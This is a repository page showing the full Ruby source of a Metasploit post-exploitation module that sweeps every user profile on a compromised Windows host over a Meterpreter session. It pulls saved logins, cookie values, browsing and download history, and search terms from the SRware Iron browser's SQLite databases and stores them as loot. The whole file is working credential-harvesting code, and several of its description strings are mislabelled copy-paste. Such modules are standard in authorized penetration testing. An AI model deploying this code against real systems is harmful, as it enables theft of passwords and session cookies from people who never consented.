adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/modules/post/windows/gather/credentials/srware.rb
T

130 lines
4.1 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
include Msf::Post::Windows::Packrat
ARTIFACTS =
{
application: 'srware',
app_category: 'browsers',
gatherable_artifacts: [
{
filetypes: 'logins',
path: 'LocalAppData',
dir: 'Chromium',
artifact_file_name: 'Login Data',
description: "SRware's sent and received emails",
credential_type: 'sqlite',
sql_search: [
{
sql_description: "Database Commands which exports SRware's Login data",
sql_table: 'logins',
sql_column: 'action_url, username_value'
}
]
},
{
filetypes: 'cookies',
path: 'LocalAppData',
dir: 'Chromium',
artifact_file_name: 'Cookies',
description: "SRware's cookies",
credential_type: 'sqlite',
sql_search: [
{
sql_description: "Database Commands which exports SRware's Login data",
sql_table: 'cookies',
sql_column: 'host_key, name, path, value'
}
]
},
{
filetypes: 'web_history',
path: 'LocalAppData',
dir: 'Chromium',
artifact_file_name: 'History',
description: "SRware's visited websites history",
credential_type: 'sqlite',
sql_search: [
{
sql_description: "Database Commands which exports SRware's Login data",
sql_table: 'urls',
sql_column: 'url, title'
},
{
sql_description: "Database Commands which exports SRware's Login data",
sql_table: 'downloads',
sql_column: 'current_path, site_url'
},
{
sql_description: "Database Commands which exports SRware's Login data",
sql_table: 'segments',
sql_column: 'name'
},
{
sql_description: 'keyword search terms',
sql_table: 'keyword_search_terms',
sql_column: 'term'
}
]
}
]
}.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Srware Credential Gatherer',
'Description' => %q{
This module searches for Srware credentials on a Windows host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.
},
'License' => MSF_LICENSE,
'Author' => [
'Kazuyoshi Maruta',
'Daniel Hallsworth',
'Barwar Salim M',
'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options(
[
OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
# enumerates the options based on the artifacts that are defined below
OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
]
)
end
def run
print_status('Filtering based on these selections: ')
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
# used to grab files for each user on the remote host
grab_user_profiles.each do |userprofile|
run_packrat(userprofile, ARTIFACTS)
end
print_status 'PackRat credential sweep completed'
end
end
Reference in New Issue View Git Blame Copy Permalink